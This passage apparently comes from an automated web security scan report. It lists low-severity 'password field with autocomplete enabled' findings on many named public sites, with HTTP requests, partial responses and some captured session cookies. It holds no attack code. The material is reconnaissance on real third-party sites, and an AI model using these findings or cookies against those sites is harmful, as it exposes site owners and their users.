Path:	/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.144. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.145. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.146. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.147. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.148. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.149. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.150. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.151. http://www.lithuanianjoomla.com/joomla-sasajos.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-sasajos.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-sasajos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.152. http://www.lithuanianjoomla.com/joomla-saugumas.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-saugumas.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-saugumas.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-saugumas.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.153. http://www.lithuanianjoomla.com/joomla-versijos.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-versijos.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-versijos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.154. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/kaip-idiegti-joomla.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.155. http://www.lithuanianjoomla.com/kontaktai.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/kontaktai.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/kontaktai.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.156. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/lithuanianjoomlacom-misija.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.157. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/lithuanianjoomlacom-vizija.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.158. http://www.lithuanianjoomla.com/naujienos.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/naujienos.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.159. http://www.lithuanianjoomla.com/saugi-joomla.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/saugi-joomla.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.160. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/saugi-joomla.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.161. http://www.livejournal.com/update.bml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/update.bml

Issue detail

The page contains a form with the following action URL:

http://www.livejournal.com/update.bml

The form contains the following password field with autocomplete enabled:

password

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.162. http://www.livejournal.com/update.bml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/update.bml

Issue detail

The page contains a form with the following action URL:

https://www.livejournal.com/login.bml?ret=1

The form contains the following password field with autocomplete enabled:

password

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<div class="lj_loginform" id="Login">
<form style='margin: 0; padding: 0;' method="post" action="https://www.livejournal.com/login.bml?ret=1" id="login" class="lj_login_form">

<input type='hidden' name='mode' value='login' />
...[SNIP]...
<td style='white-space: nowrap;'><input type="password" name="password" size="15" class="lj_login_password" tabindex="2" />
<input type='submit' value="Log in" tabindex='3' />
...[SNIP]...

15.163. http://www.myspace.com/netlingo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/netlingo

Issue detail

The page contains a form with the following action URL:

https://www.myspace.com/auth/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.164. http://www.nbc.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nbc.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.nbc.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.nbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.165. http://www.netlingo.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

http://www.netlingo.com/login-action.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.166. http://www.netlingo.com/register-premium.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/register-premium.php

Issue detail

The page contains a form with the following action URL:

http://www.netlingo.com/register-premium.php

The form contains the following password fields with autocomplete enabled:

password
password2

Request

GET /register-premium.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.167. http://www.netlingo.com/register.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/register.php

Issue detail

The page contains a form with the following action URL:

http://www.netlingo.com/register.php

The form contains the following password fields with autocomplete enabled:

password
password2

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.168. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The page contains a form with the following action URL:

http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

The form contains the following password field with autocomplete enabled:

upass

Request

Response

15.169. http://www.noreastermagazine.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.noreastermagazine.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.noreastermagazine.com/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.170. http://www.paperg.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.paperg.com/

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

15.171. https://www.paperg.com/post.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The page contains a form with the following action URL:

https://www.paperg.com/process.php

The form contains the following password fields with autocomplete enabled:

login_password
account_password
account_confirm_password

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
</script>


                                                                           <form name="campaign_form" enctype="multipart/form-data" action="process.php" method="POST" onsubmit="onFormSubmit();">
                   <input type="hidden" name="owner_id" value="0">
...[SNIP]...
<td>
                               <input type="password" name="login_password" id="login_password" onkeydown="on_login_enter(event);" onchange="saveInput(this.getAttribute( 'name' ));"/>
                               <span id="msg_login_password">
...[SNIP]...
<td>
                               <input maxlength=30 name="account_password" type="password" onchange="saveInput(this.getAttribute( 'name' ));" />
                               <br />
...[SNIP]...
<td>
                               <input maxlength=30 name="account_confirm_password" type="password" />
                               <span id="msg_account_confirm_password">
...[SNIP]...

15.172. https://www.paperg.com/post.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The page contains a form with the following action URL:

https://www.paperg.com/login.php

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.173. http://www.playshakespeare.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.playshakespeare.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.playshakespeare.com/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.174. http://www.regattaregatta.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.regattaregatta.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.regattaregatta.com/index.php/component/user/?task=login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.175. http://www.rockettheme.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.rockettheme.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.rockettheme.com/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: www.rockettheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.176. http://www.shape.com/workouts/articles/blood_sugar.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The page contains a form with the following action URL:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field with autocomplete enabled:

password

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.177. http://www.shape.com/workouts/articles/workout_schedule.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The page contains a form with the following action URL:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field with autocomplete enabled:

password

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.178. http://www.svenskjoomla.se/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.svenskjoomla.se
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://www.svenskjoomla.se/index.php?option=com_comprofiler&task=login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /index.php HTTP/1.1
Host: www.svenskjoomla.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.179. http://www.thefeast.com/boston/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.180. http://www.thefeast.com/boston/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

regPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.181. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

loginPassword

Request

Response

15.182. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

regPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.183. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

loginPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>

<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />

...[SNIP]...

15.184. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

regPassword

Request

Response

15.185. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

loginPassword

Request

Response

15.186. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL:

http://www.thefeast.com/i/dispatcher/?h=feastuser

The form contains the following password field with autocomplete enabled:

regPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>

<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">

<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.187. http://www.usaca.info/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.usaca.info
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.usaca.info/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.188. http://www.w-w-i.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.w-w-i.com/logoffon.php

The form contains the following password field with autocomplete enabled:

pword

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.189. http://www.w-w-i.com/velux_5_oceans_2010_race/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.w-w-i.com
Path:	/velux_5_oceans_2010_race/

Issue detail

The page contains a form with the following action URL:

http://www.w-w-i.com/velux_5_oceans_2010_race/logoffon.php

The form contains the following password field with autocomplete enabled:

pword

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.190. http://www.woothemes.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.woothemes.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.woothemes.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.191. http://www.x64bitdownload.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.192. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.193. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.194. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.195. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.196. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.197. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.198. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.199. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The page contains a form with the following action URL:

http://www.x64bitdownload.com/login.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

